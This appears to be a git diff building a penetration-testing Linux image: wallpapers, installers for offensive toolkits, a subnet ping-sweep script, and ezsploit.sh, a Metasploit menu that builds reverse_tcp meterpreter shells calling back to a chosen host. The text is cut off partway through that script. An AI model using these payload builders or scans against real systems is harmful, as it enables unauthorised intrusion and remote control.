00000000..c89ec8b3 Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/1489388.jpg differ diff --git a/filesystem/root/Pictures/Wallpapers/BT-Wallpaper.png b/filesystem/root/Pictures/Wallpapers/BT-Wallpaper.png new file mode 100755 index 00000000..2e3473d6 Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/BT-Wallpaper.png differ diff --git a/filesystem/root/Pictures/Wallpapers/Backtrack.jpg b/filesystem/root/Pictures/Wallpapers/Backtrack.jpg new file mode 100755 index 00000000..55697932 Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/Backtrack.jpg differ diff --git a/filesystem/root/Pictures/Wallpapers/Hacker.jpg b/filesystem/root/Pictures/Wallpapers/Hacker.jpg new file mode 100755 index 00000000..cc720bd1 Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/Hacker.jpg differ diff --git a/filesystem/root/Pictures/Wallpapers/Hackerfree.jpg b/filesystem/root/Pictures/Wallpapers/Hackerfree.jpg new file mode 100755 index 00000000..30d5a8bb Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/Hackerfree.jpg differ diff --git a/filesystem/root/Pictures/Wallpapers/Hooded-Hacker.jpg b/filesystem/root/Pictures/Wallpapers/Hooded-Hacker.jpg new file mode 100755 index 00000000..a60afdc7 Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/Hooded-Hacker.jpg differ diff --git a/filesystem/root/Pictures/Wallpapers/Kali 1.png b/filesystem/root/Pictures/Wallpapers/Kali 1.png new file mode 100755 index 00000000..b2eeac1a Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/Kali 1.png differ diff --git a/filesystem/root/Pictures/Wallpapers/Kali.JPG b/filesystem/root/Pictures/Wallpapers/Kali.JPG new file mode 100755 index 00000000..f3ecc401 Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/Kali.JPG differ diff --git a/filesystem/root/Pictures/Wallpapers/Kali1.jpg b/filesystem/root/Pictures/Wallpapers/Kali1.jpg new file mode 100755 index 00000000..14e66d78 Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/Kali1.jpg differ diff --git a/filesystem/root/Pictures/Wallpapers/Kali10.gif b/filesystem/root/Pictures/Wallpapers/Kali10.gif new file mode 100755 index 00000000..b1798765 Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/Kali10.gif differ diff --git a/filesystem/root/Pictures/Wallpapers/Kali3.jpg b/filesystem/root/Pictures/Wallpapers/Kali3.jpg new file mode 100755 index 00000000..957ed15e Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/Kali3.jpg differ diff --git a/filesystem/root/Pictures/Wallpapers/Kali4.png b/filesystem/root/Pictures/Wallpapers/Kali4.png new file mode 100755 index 00000000..dedf3e02 Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/Kali4.png differ diff --git a/filesystem/root/Pictures/Wallpapers/Kali6.jpg b/filesystem/root/Pictures/Wallpapers/Kali6.jpg new file mode 100755 index 00000000..ab250c77 Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/Kali6.jpg differ diff --git a/filesystem/root/Pictures/Wallpapers/Kali7.jpg b/filesystem/root/Pictures/Wallpapers/Kali7.jpg new file mode 100755 index 00000000..5c4679f3 Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/Kali7.jpg differ diff --git a/filesystem/root/Pictures/Wallpapers/Kali9.png b/filesystem/root/Pictures/Wallpapers/Kali9.png new file mode 100755 index 00000000..c7f86ec2 Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/Kali9.png differ diff --git a/filesystem/root/Pictures/Wallpapers/SecurityHacker.jpg b/filesystem/root/Pictures/Wallpapers/SecurityHacker.jpg new file mode 100755 index 00000000..56888d11 Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/SecurityHacker.jpg differ diff --git a/filesystem/root/Pictures/Wallpapers/bt4-logo-wallpaper.png b/filesystem/root/Pictures/Wallpapers/bt4-logo-wallpaper.png new file mode 100755 index 00000000..9a33136a Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/bt4-logo-wallpaper.png differ diff --git a/filesystem/root/Pictures/Wallpapers/computer-hacker.jpg b/filesystem/root/Pictures/Wallpapers/computer-hacker.jpg new file mode 100755 index 00000000..795f0c0e Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/computer-hacker.jpg differ diff --git a/filesystem/root/Pictures/Wallpapers/hacker_2621842b.jpg b/filesystem/root/Pictures/Wallpapers/hacker_2621842b.jpg new file mode 100755 index 00000000..0b818871 Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/hacker_2621842b.jpg differ diff --git a/filesystem/root/Pictures/Wallpapers/kali11.png b/filesystem/root/Pictures/Wallpapers/kali11.png new file mode 100755 index 00000000..4c963990 Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/kali11.png differ diff --git a/filesystem/root/Pictures/Wallpapers/kali12.jpg b/filesystem/root/Pictures/Wallpapers/kali12.jpg new file mode 100755 index 00000000..90fb095f Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/kali12.jpg differ diff --git a/filesystem/root/Pictures/Wallpapers/kali13.png b/filesystem/root/Pictures/Wallpapers/kali13.png new file mode 100755 index 00000000..ee45685f Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/kali13.png differ diff --git a/filesystem/root/Pictures/Wallpapers/kali14.jpg b/filesystem/root/Pictures/Wallpapers/kali14.jpg new file mode 100755 index 00000000..14e66d78 Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/kali14.jpg differ diff --git a/filesystem/root/Pictures/Wallpapers/kali15.png b/filesystem/root/Pictures/Wallpapers/kali15.png new file mode 100755 index 00000000..2990a71d Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/kali15.png differ diff --git a/filesystem/root/Pictures/Wallpapers/kali16.jpg b/filesystem/root/Pictures/Wallpapers/kali16.jpg new file mode 100755 index 00000000..3e91e63e Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/kali16.jpg differ diff --git a/filesystem/root/Pictures/Wallpapers/kali17.jpg b/filesystem/root/Pictures/Wallpapers/kali17.jpg new file mode 100755 index 00000000..b8cf494b Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/kali17.jpg differ diff --git a/filesystem/root/Pictures/Wallpapers/kali19.jpg b/filesystem/root/Pictures/Wallpapers/kali19.jpg new file mode 100755 index 00000000..d206d6d5 Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/kali19.jpg differ diff --git a/filesystem/root/Pictures/Wallpapers/kali20.jpg b/filesystem/root/Pictures/Wallpapers/kali20.jpg new file mode 100755 index 00000000..eac84bcf Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/kali20.jpg differ diff --git a/filesystem/root/Pictures/Wallpapers/kali21.jpg b/filesystem/root/Pictures/Wallpapers/kali21.jpg new file mode 100755 index 00000000..01227782 Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/kali21.jpg differ diff --git a/filesystem/root/Pictures/Wallpapers/kali5.jpg b/filesystem/root/Pictures/Wallpapers/kali5.jpg new file mode 100755 index 00000000..c402188f Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/kali5.jpg differ diff --git a/filesystem/root/Pictures/Wallpapers/kali8.jpg b/filesystem/root/Pictures/Wallpapers/kali8.jpg new file mode 100755 index 00000000..4e577323 Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/kali8.jpg differ diff --git a/filesystem/root/Pictures/Wallpapers/shatter-backtrack_00000.jpg b/filesystem/root/Pictures/Wallpapers/shatter-backtrack_00000.jpg new file mode 100755 index 00000000..530fd430 Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/shatter-backtrack_00000.jpg differ diff --git a/filesystem/root/Pictures/Wallpapers/untitled.png b/filesystem/root/Pictures/Wallpapers/untitled.png new file mode 100755 index 00000000..e3fdb0ef Binary files /dev/null and b/filesystem/root/Pictures/Wallpapers/untitled.png differ diff --git a/filesystem/root/Videos/.blankfile b/filesystem/root/Videos/.blankfile new file mode 100644 index 00000000..e69de29b diff --git a/filesystem/root/bin/.blankfile b/filesystem/root/bin/.blankfile new file mode 100644 index 00000000..e69de29b diff --git a/filesystem/root/payloads/.blankfile b/filesystem/root/payloads/.blankfile new file mode 100644 index 00000000..e69de29b diff --git a/filesystem/root/postinstall.sh b/filesystem/root/postinstall.sh new file mode 100755 index 00000000..2fb08635 --- /dev/null +++ b/filesystem/root/postinstall.sh @@ -0,0 +1,36 @@ +!/bin/bash +# init +function pause(){ +echo ' ' +echo 'Press any key to continue...'; read -p "$*" +} +clear +echo 'System Update' +echo '______________________________________ ' +apt update +echo 'Update RSA SSH Keys' +ssh-keygen -t rsa +systemctl restart ssh +systemctl enable ssh --now +systemctl enable cups --now +systemctl enable apache2 --now +systemctl enable mysql --new +systemctl enable postgresql --now +systemctl enable tor --now +systemctl enable cockpit.socket --new +echo 'Init Metacploit Database' +msfdb init +echo 'Init File Locater Database' +updatedb +echo 'Get Stuff from github' +echo 'Get Veil Framework' +git clone https://github.com/Veil-Framework/Veil.git +echo 'Get Discover Scripts for Gethub' +git clone https://github.com/leebaird/discover.git +echo 'Get Penetration Testing Framework' +git clone https://github.com/trustedsec/ptf +pause +apt upgrade -y +echo '' +echo 'Finished.............' + diff --git a/filesystem/root/scripts/cart-k.sh b/filesystem/root/scripts/cart-k.sh new file mode 100755 index 00000000..e54343ad --- /dev/null +++ b/filesystem/root/scripts/cart-k.sh @@ -0,0 +1,138 @@ +#!/bin/bash + +#Written by Terminal Prophet +#Not for enterprise use + +#CHANGELOG +#2/8/18: Tested sleep .1, worked but took ~2h. Taking it down to .025, should take > 30m +#2/8/18: Added start/end timestamps for testing/debugging +#2/8/18: Changed file creation to a variable, for easier nbtscan integration +#2/8/18: NBTScan integration, using variables in functions +#2/9/18: Sleep .025 works +#2/9/18: Added ASCII art logo and branding + + +#user=$(whoami) +#echo "$user" +mkdir /root/Documents/cartographer_results +function pause(){ + read -p "$*" +} + +function psweep3(){ +#echo "Enter 1st, 2nd, 3rd octets seperated by a space (ex: 192 168 1)" +read oct1 oct2 oct3 +printf 'Start = %(%H:%M:%S)T' +echo +echo +for ip in $(seq 1 254); do +ping -c 1 $oct1.$oct2.$oct3.$ip |grep "bytes from" |cut -d" " -f4|cut -d";" -f1& +sleep .025 +done +echo +printf 'End = %(%H:%M:%S)T' +echo +echo +} + +function psweep2(){ +#echo "Enter 1st, 2nd octets seperated by a space (ex: 192 168)" +read oct1 oct2 +printf 'Start = %(%H:%M:%S)T' +echo +echo +for ip3 in $(seq 0 255); do + for ip4 in $(seq 1 254); do + ping -c 1 $oct1.$oct2.$ip3.$ip4 |grep "bytes from" |cut -d" " -f4|cut -d";" -f1& + sleep .025 + done +done +echo +printf 'End = %(%H:%M:%S)T' +echo +echo +} + + +function psweep1(){ +#echo "Enter 1st octet" +read oct1 +printf 'Start = %(%H:%M:%S)T' +echo +echo +for ip2 in $(seq 0 255); do + for ip3 in $(seq 0 255); do + for ip4 in $(seq 1 254); do + ping -c 1 $oct1.$ip2.$ip3.$ip4 |grep "bytes from" |cut -d" " -f4|cut -d";" -f1& + sleep .025 + done + done +done +echo +printf 'End = %(%H:%M:%S)T' +echo +echo +} + +clear +echo " ______ __ __ " +echo " / ____/___ ______/ /_____ ____ __________ ____ / /_ ___ _____ " +echo " / / / __ / ___/ __/ __ \/ _ / ___/ __ / __ \/ __ \/ _ \/ ___/ " +echo "/ /___/ /_/ / / / /_/ /_/ / /_/ / / / /_/ / /_/ / / / / __/ / " +echo "\____/\__,_/_/ \__/\____/\__, /_/ \__,_/ .___/_/ /_/\___/_/ " +echo " /____/ /_/ " +echo " By: TerminalProphet " +echo " Kali Edition " +echo " " +echo " Active host discovery made easy " +echo " " +echo " " +echo " " +echo "Please select number of octets to set:" +PS3='>>>' +options=("1 octet (not recommended)" "2 octets (about 30min)" "3 octets (about 30sec)" "Quit") +select opt in "${options[@]}" +do + case $opt in + + "1 octet (not recommended)") + #oneoct + echo "Enter 1st octet" +text1="/root/Documents/cartographer_results/ClassA_$(date +%Y%m%d_%H-%M-%S)" + psweep1 > $text1.txt + /usr/bin/nbtscan $oct1.0.0.0/8 >> $text1.txt + echo "Results have been stored at $text1" + pause 'Press any key to continue...' + clear + ;; + + + "2 octets (about 30min)") + #twooct + echo "Enter 1st and 2nd octets seperated by a space (ex: 192 168)" +text2="/root/Documents/cartographer_results/ClassB_$(date +%Y%m%d_%H-%M-%S)" + psweep2 > $text2.txt + /usr/bin/nbtscan $oct1.$oct2.0.0/16 >> $text2.txt + echo "Results have been stored at $text2" + pause 'Press any key to continue...' + clear + ;; + + + "3 octets (about 30sec)") + #threeoct + echo "Enter 1st, 2nd, 3rd octets seperated by a space (ex: 192 168 1)" +text3="/root/Documents/cartographer_results/ClassC_$(date +%Y%m%d_%H-%M)" + psweep3 > $text3.txt + /usr/bin/nbtscan $oct1.$oct2.$oct3.0/24 >> $text3.txt + echo "Results have been stored at $text3" + pause 'Press any key to continue...' + clear + ;; + "Quit") + clear + break + ;; + *) echo invalid option;; + esac +done diff --git a/filesystem/root/scripts/duck_installer_v1.1.1_debian.sh b/filesystem/root/scripts/duck_installer_v1.1.1_debian.sh new file mode 100755 index 00000000..611e0fac --- /dev/null +++ b/filesystem/root/scripts/duck_installer_v1.1.1_debian.sh @@ -0,0 +1,384 @@ +#!/bin/bash +# Simple-Ducky Payload Generator Installer v1.1.1 +# Last Updated: 24 Jun 2013 +# Author: Travis Weathers (skysploit) | skysploit@gmail.com + +####################################################### +# Simple-Ducky Download +####################################################### +f_installer(){ +clear +echo -e "\e[1;34m[*] Please wait while I download and install the Simple-Ducky Payload Generator\e[0m" +echo "" +sleep 4 +rm -rf /usr/share/ducky +rm -rf /usr/share/simple-ducky/ +git clone --recursive git://github.com/skysploit/simple-ducky.git /usr/share/simple-ducky +bash /usr/share/simple-ducky/install.sh +echo "" +echo -e "\e[1;32m[+] The Simple-Ducky installed sucessfully.\e[0m" +echo "" +sleep 4 +clear + +echo -e "\e[1;34m[*] Performing an APT Update prior to installing dependencies...\e[0m\n" +sleep 3 +apt-get update +echo "" +echo -e "\e[1;32m[+] APT Update complete...\e[0m" +sleep 3 +clear + +echo -e "\e[1;34m[*] Please wait while I install some dependencies...\e[0m\n" +sleep 3 +updatedb +mkdir /tmp/simple-ducky/ +echo "" + + machine=$(cat /etc/issue) + if [ "$machine" == "Kali GNU/Linux 1.0 \n \l" ]; then + echo -e "\n\e[1;34m[*] I see that you are using Kali-Linux. This will only take a few moments...\e[0m" + echo "" + sleep 3 + f_kaliinstall + else + f_otherdebian + fi + +} + +######################################################## +# Kali Install +######################################################## +f_kaliinstall(){ + reqs="pure-ftpd dfu-programmer burpsuite mingw32" + for i in $reqs; do + dpkg -s "$i" &> /tmp/simple-ducky/$i-install.txt + isinstalled=$(cat /tmp/simple-ducky/$i-install.txt | grep -o "Status: install ok installed") + if [ ! -e /usr/bin/$i ] && [ ! -e /usr/sbin/$i ] && [ ! -e /usr/local/sbin/$i ] && [ ! -e /usr/local/bin/$i ] && [ -z "$isinstalled" ]; then + echo -e "\e[1;33m[-] It doesn't appear that $i is installed on your system. Installing it now...\e[0m" + echo "" + if [ ! -z $(apt-get install -y "$i" | grep -o "E: Couldn") ]; then + echo -e "\e[1;31m[-] I had a hard time installing $i from the Kali-Linux repository.\e[0m" + touch /tmp/simple-ducky/$i-fail + else + dpkg -s "$i" &> /tmp/simple-ducky/$i-install.txt + isinstalled=$(cat /tmp/simple-ducky/$i-install.txt | grep -o "Status: install ok installed") + if [ ! -z "$isinstalled" ]; then + update=1 + echo -e "\e[1;32m[+] Good news, $i installed without any issues.\e[0m" + echo "" + sleep 2 + else + echo "" + echo -e "\e[1;31m[!] It doesn't appear that I will be able to install $i right now.\e[0m" + echo "" + sleep 2 + fi + fi + else + echo -e "\e[1;32m[+] $i is already installed on your system, moving on...\e[0m" + echo "" + sleep 2 + fi + done +f_java + +} + +######################################################## +# Other Debian Install +######################################################## +f_otherdebian(){ + reqs="pure-ftpd file-roller dfu-programmer apache2 burpsuite netcat p7zip-full nmap mingw32 john" + for i in $reqs; do + dpkg -s "$i" &> /tmp/simple-ducky/$i-install.txt + isinstalled=$(cat /tmp/simple-ducky/$i-install.txt | grep -o "Status: install ok installed") + if [ ! -e /usr/bin/$i ] && [ ! -e /usr/sbin/$i ] && [ ! -e /usr/local/sbin/$i ] && [ ! -e /usr/local/bin/$i ] && [ -z "$isinstalled" ]; then + echo -e "\e[1;33m[-] It doesn't appear that $i is installed on your system. Installing it now...\e[0m" + echo "" + if [ ! -z $(apt-get install -y "$i" | grep -o "E: Couldn") ]; then + echo -e "\e[1;31m[-] I had a hard time installing $i from the Kali-Linux repository.\e[0m" + touch /tmp/simple-ducky/$i-fail.txt + else + dpkg -s "$i" &> /tmp/simple-ducky/$i-install.txt + isinstalled=$(cat /tmp/simple-ducky/$i-install.txt | grep -o "Status: install ok installed") + if [ ! -z "$isinstalled" ]; then + update=1 + echo -e "\e[1;32m[+] Good news, $i installed without any issues.\e[0m" + echo "" + sleep 2 + else + echo "" + echo -e "\e[1;31m[!] It doesn't appear that I will be able to install $i right now.\e[0m" + echo "" + sleep 2 + fi + fi + else + echo -e "\e[1;32m[+] $i is already installed on your system, moving on...\e[0m" + echo "" + sleep 2 + fi + done + +f_metasploit +} + +######################################################## +# Metasploit +######################################################## +f_metasploit(){ +clear +echo -e "\e[1;34m[*] Checking to see if Metasploit is installed...\e[0m\n" +if [ ! -e /usr/bin/msfconsole ] && [ ! -e /usr/sbin/msfconsole ] && [ ! -e /usr/local/sbin/msfconsole ] && [ ! -e /usr/local/bin/msfconsole ]; then + update=1 + echo -e "\n\e[1;34m[*] It doesn't appear that Metasploit is installed on your system. Installing it now...\e[0m" + echo "" + machine=$(uname -m) + if [ "$machine" == "x86_64" ]; then + wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run -O /tmp/simple-ducky/metasploit-latest-linux-x64-installer.run + echo -e "\n\e[1;33m[*] Launching the Metasploit installer. Select all the defaults and DONT launch the web UI...\e[0m" + echo "" + sleep 3 + chmod 755 /tmp/simple-ducky/metasploit-latest-linux-x64-installer.run + /tmp/simple-ducky/metasploit-latest-linux-x64-installer.run + else + wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run -O /tmp/simple-ducky/metasploit-latest-linux-installer.run + echo -e "\n\e[1;33m[*] Launching the Metasploit installer. Select all the defaults and DONT launch the web UI...\e[0m" + echo "" + sleep 3 + chmod 755 /tmp/simple-ducky/metasploit-latest-linux-installer.run + /tmp/simple-ducky/metasploit-latest-linux-installer.run + fi + + cd /usr/bin + msfprogs="msfconsole msfupdate msfencode msfpayload" + for z in $msfprogs; do + if [ ! -e /usr/bin/$z ]; then + ln -f -s /usr/local/bin/$z $z + fi + done +fi +echo -e "\e[1;32m[+] Good news, Metasploit installed without any issues.\e[0m" +echo "" +sleep 2 + +f_setoolkit +} + +######################################################## +# SE-Toolkit +######################################################## +f_setoolkit(){ +clear +echo -e "\e[1;34m[+] Checking to see if the Social Engineering Toolkit is installed...\e[0m\n" +echo "" +sleep 4 + dpkg -s "set" &> /tmp/simple-ducky/set-install.txt + setoolkit=$(cat /tmp/simple-ducky/set-install.txt | grep -o "Status: install ok installed") + if [ "$setoolkit" == "Status: install ok installed" ]; then + echo -e "\e[1;32m[+] The SE-Toolkit is already installed on your system, moving on...\e[0m" + echo "" + sleep 4 + else + echo -e "\e[1;33m[-] It doesn't appear that the SE-Toolkit is installed on your system. Installing it now...\e[0m" + echo -e "" + sleep 3 + git clone https://github.com/trustedsec/social-engineer-toolkit/ /tmp/simple-ducky/set/ + chmod 755 /tmp/simple-ducky/set/setup.py + python /tmp/simple-ducky/set/setup.py install + echo "" + echo -e "\e[1;32m[+] Good news, the SE-Toolkit installed without any issues.\e[0m" + echo "" + sleep 2 + fi + + +bsuite=$(cat /tmp/simple-ducky/burpsuite-install.txt | grep -o "is not installed" ) + if [ "$bsuite" == "is not installed" ]; then + f_burpsuite + else + f_java +fi +} + +######################################################## +# Burpsuite +####################################################### +f_burpsuite(){ + clear + echo -e "\e[1;34mTrying a different approach to install Burpsuite...\e[0m\n" + echo "" + sleep 3 + mkdir /usr/share/burpsuite/ + wget http://portswigger.net/burp/burpsuite_free_v1.5.jar -O /usr/share/burpsuite/burpsuite.jar + chmod 755 /usr/share/burpsuite/burpsuite.jar + ln -s /usr/share/burpsuite/burpsuite.jar /usr/bin/burpsuite.jar + echo "" + echo -e "\e[1;32m[+] Good news, Burpsuite installed without any issues.\e[0m" + sleep 3 + clear +f_java +} + +######################################################## +# JavaInstall +######################################################## +f_java(){ +clear +echo -e "\e[1;34m[+] Checking your JDK version, I will update it if needed...\e[0m\n" +echo "" +sleep 4 + java -version &> /tmp/simple-ducky/java-version.txt + javainstall=$(cat /tmp/simple-ducky/java-version.txt | grep -o "1.7.0") + if [ "$javainstall" == "1.7.0" ]; then + echo -e "\e[1;32m[+] It looks like your JDK is up to date, moving on..." + sleep 4 + else + echo -e "\e[1;33m[+] It looks like we need to update JDK to version 1.7.0\e[0m" + echo -e "" + sleep 3 + apt-get install -y openjdk-7-jre-headless + echo "" + echo -e "\e[1;33m[*] When prompted select the option for: '...java-7-openjdk...'\e[0m" + echo "" + sleep 4 + update-alternatives --config java + echo "" + echo -e "\e[1;32m[+] Your new JDK version is...\e[0m" + echo "" + java -version + sleep 5 + clear + fi + +f_ftpconfig +} + +######################################################## +# Alternate John Installer (Disabled) +######################################################## +f_johninstall(){ + echo -e "\n\e[1;34m[*] It doesn't appear that John is installed on your system. Installing it now...\e[0m" + echo "" + machine=$(uname -m) + if [ "$machine" == "x86_64" ]; then + wget http://www.openwall.com/john/g/john-1.7.9-jumbo-7.tar.gz -O /tmp/simple-ducky/john-1.7.9-jumbo-7.tar.gz + mkdir /usr/share/john/ + cd /tmp/simple-ducky/ + tar zxvf /tmp/simple-ducky/john-1.7.9-jumbo-7.tar.gz + cd john-1.7.9-jumbo-7/ + cp * /usr/share/john/ + cd /usr/share/john/src/ + make + make clean generic + ln -s /usr/share/john/run/john /usr/bin/john + touch /usr/bin/john.ini + touch /usr/share/john/john.ini + touch /root/john.ini + else + wget http://www.openwall.com/john/g/john-1.7.9-jumbo-7.tar.gz -O /tmp/simple-ducky/john-1.7.9-jumbo-7.tar.gz + mkdir /usr/share/john/ + cd /tmp/simple-ducky/ + tar zxvf /tmp/simple-ducky/john-1.7.9-jumbo-7.tar.gz + cd john-1.7.9-jumbo-7/ + cp * /usr/share/john/ + cd /usr/share/john/src/ + make + make clean generic + ln -s /usr/share/john/run/john /usr/bin/john + touch /usr/bin/john.ini + touch /usr/share/john/john.ini + touch /root/john.ini + fi + echo "" + echo -e "\e[1;32m[+] Good news, Burpsuite installed without any issues.\e[0m" + sleep 3 + clear + +f_ftpconfig +} + +################################################################## +# FTP Configuration +################################################################## +f_ftpconfig(){ +clear +echo -e "\e[1;34mChecking to see if pure-ftpd has been configured. I will walk you through configuration if it is not...\e[0m\n" +echo "" +sleep 4 + cat /etc/group &> /tmp/simple-ducky/ftp-group1.txt + cat /etc/group &> /tmp/simple-ducky/ftp-group2.txt + ftpconfig1=$(cat /tmp/simple-ducky/ftp-group1.txt | grep -o "ftpgroup:x:1000") + ftpconfig2=$(cat /tmp/simple-ducky/ftp-group2.txt | grep -o "ftpgroup:x:1001") + if [ "$ftpconfig1" == "ftpgroup:x:1000" ]; then + echo -e "\e[1;32m[+] I see that you have already configured pure-ftpd, moving on...\e[0m" + echo "" + sleep 4 + elif [ "$ftpconfig2" == "ftpgroup:x:1001" ]; then + echo -e "\e[1;32m[+] I see that you have already configured pure-ftpd, moving on...\e[0m" + echo "" + sleep 4 + else + echo -e "\e[1;33m[*] It doesn't appear that you have setup pure-ftpd... Let's start!\e[0m" + echo "" + read -p "[-] Who would you like the primary user to be? " ftpusername + echo "" + echo -e "\e[1;33m[-] Configuring pure-FTPD for: $ftpusername\e[0m" + echo "" + sleep 3 + groupadd ftpgroup + useradd -g ftpgroup -d /dev/null -s /etc ftpuser + echo -e "\e[1;33m[-] Please set the password for $ftpusername.\e[0m" + pure-pw useradd $ftpusername -u ftpuser -d /ftphome + pure-pw mkdb + cd /etc/pure-ftpd/auth/ + ln -s ../conf/PureDB 60pdb + echo "" + echo -e "\e[1;33m[-] Creating your home directory, it will reside at /ftphome/\e[0m" + echo "" + sleep 3 + mkdir /ftphome + chown -R ftpuser:ftpgroup /ftphome/ + echo -e "\e[1;33m[-] Starting the FTP server.\e[0m" + echo "" + sleep 2 + service pure-ftpd restart + echo "" + echo -e "\e[1;32m[+] Done! To test your new account, in a new terminal type: ftp 127.0.0.1\e[0m" + echo "" + read -p "Press any key to contiue" enter + fi +f_cleanupexit +} + +################################################################################# +# Cleanup and exit +################################################################################# +f_cleanupexit(){ + clear + echo "" + echo -e "\e[1;32m[+] The installation process is complete!\e[0m" + echo "" + echo -e "\e[1;32m[+] Type: simple-ducky in the terminal to launch...\e[0m" + echo "" + echo -e "\e[1;32m[+] Note: The simple-ducky is now located at /usr/share/simple-ducky\e[0m" + echo "" + read -p "Press any key to continue" continue + rm -rf /tmp/simple-ducky/ + clear + exit +} + +################################################################################# +# Run as Root Query +################################################################################# +resize -s 35 115 +cd /usr/share/ducky/encoder +if [ "$(id -u)" != "0" ]; then + echo -e "\e[1;31m[!] This script must be run as root\e[0m" 1>&2 + exit 1 +else + f_installer +fi diff --git a/filesystem/root/scripts/duckencoder.jar b/filesystem/root/scripts/duckencoder.jar new file mode 100755 index 00000000..b9be2c76 Binary files /dev/null and b/filesystem/root/scripts/duckencoder.jar differ diff --git a/filesystem/root/scripts/encode.sh b/filesystem/root/scripts/encode.sh new file mode 100755 index 00000000..68fea7af --- /dev/null +++ b/filesystem/root/scripts/encode.sh @@ -0,0 +1 @@ +java -jar duckencode.jar -i payload.txt diff --git a/filesystem/root/scripts/ezsploit.sh b/filesystem/root/scripts/ezsploit.sh new file mode 100755 index 00000000..33181ea9 --- /dev/null +++ b/filesystem/root/scripts/ezsploit.sh @@ -0,0 +1,288 @@ +#!/bin/bash +# etc etc etc +# .................. +[[ `id -u` -eq 0 ]] || { echo -e "\e[31mMust be root to run script"; exit 1; } +resize -s 30 60 +clear # Clear the screen. +SERVICE=service; + +if ps ax | grep -v grep | grep metasploit > /dev/null +then + echo "$SERVICE service running" +else + echo "$SERVICE is not running, Starting service." + sudo service metasploit start +fi +mkdir ~/Desktop/temp +clear +clear +echo -e "\E[1;33m:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" +echo -e "\E[1;33m:::::::::::::: \e[97mMetasploit service started \E[1;33m:::::::::::::::::" +echo -e "\E[1;33m:::::: \e[97mScripts and payloads saved to ~/Desktop/temp/ \E[1;33m::::::" +echo -e "\E[1;33m:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" +read -p "Press [Enter] key to Continue..." +clear +echo -e "\E[1;33m:::::::::::::: \e[97mMetasploit automation script \E[1;33m:::::::::::::::" +echo -e "\e[97m ______ + .- -. + / \ by rand0m1ze + \e[94m* \e[97m \e[90m* \e[97m + |, .-. .-. ,| \e[32m* \e[97m + | )(_ / \_ )( | + |/ /\ \| \e[34m* \e[97m + (@_ <__ ^^ __> \e[95m* \e[97m + _ ) \_______\__|IIIIII|__/____________\e[31m___________ \e[97m + (_)\e[31m@8@8\e[97m{}<________\e[31m_____\e[97m_____________\e[31m___________________> \e[97m + )_/ \ IIIIII / \e[31m::::: \e[97m + (@ -------- \e[31m:: \e[97m + " +tput sgr0 # +echo -e "\e[31m_________________________[ \e[97mSELECT AN OPTION TO BEGIN \e[31m]" +echo -e "\E[1;33m::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" +echo -e "\E[1;33m:::\e[97m[1] \e[90mPayload \e[97m [Create a payload with msvenom] \E[1;33m" +tput sgr0 # Reset colors to "normal." +echo -e "\E[1;33m:::\e[97m[2] \e[32mListen \e[97m [Start a multi handler] \E[1;33m" +tput sgr0 +echo -e "\E[1;33m:::\e[97m[3] \e[34mExploit \e[97m [Drop into msfconsole]\E[1;33m" +tput sgr0 +echo -e "\E[1;33m:::\e[97m[4] \e[95mPersistence \e[97m [Forge a Persistence script] \E[1;33m" +tput sgr0 +echo -e "\E[1;33m:::\e[97m[5] \e[31mArmitage \e[97m [Launch Armitage GUI] \E[1;33m" +tput sgr0 +echo -e "\E[1;33m:::\e[97m[X] \e[32mHack The Gibson \e[97m [Hac/< The P1aneT] \E[1;33m" +tput sgr0 # Reset attributes. +echo -e "\E[1;33m::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" +echo -e "\e[97m~~~~~~~~~~~~~~~~~~~~ \e[31mGreetz to the 2600 \e[97m~~~~~~~~~~~~~~~~~~~~\e[31m" +tput sgr0 + + +read options + +case "$options" in +# Note variable is quoted. + + "1" | "1" ) + # Accept upper or lowercase input. + echo -e "\E[1;33m::::: \e[97mLets Craft a PAYLOAD\E[1;33m:::::" + +PS3='Enter your choice 6=QUIT: ' +options=("Windows" "Linux" "Mac" "Android" "List_All" "Quit") +select opt in "${options[@]}" +do + case $opt in + "Windows") + read -p 'Set LHOST IP: ' uservar; read -p 'Set LPORT: ' userport + msfvenom -p windows/meterpreter/reverse_tcp LHOST=$uservar LPORT=$userport -f exe > ~/Desktop/temp/shell.exe + echo -e "\E[1;33m::::: \e[97mshell.exe saved to ~/Desktop/temp\E[1;33m:::::" + ;; + "Linux") + read -p 'Set LHOST IP: ' uservar; read -p 'Set LPORT: ' userport + msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$uservar LPORT=$userport -f elf > ~/Desktop/temp/shell.elf + echo -e 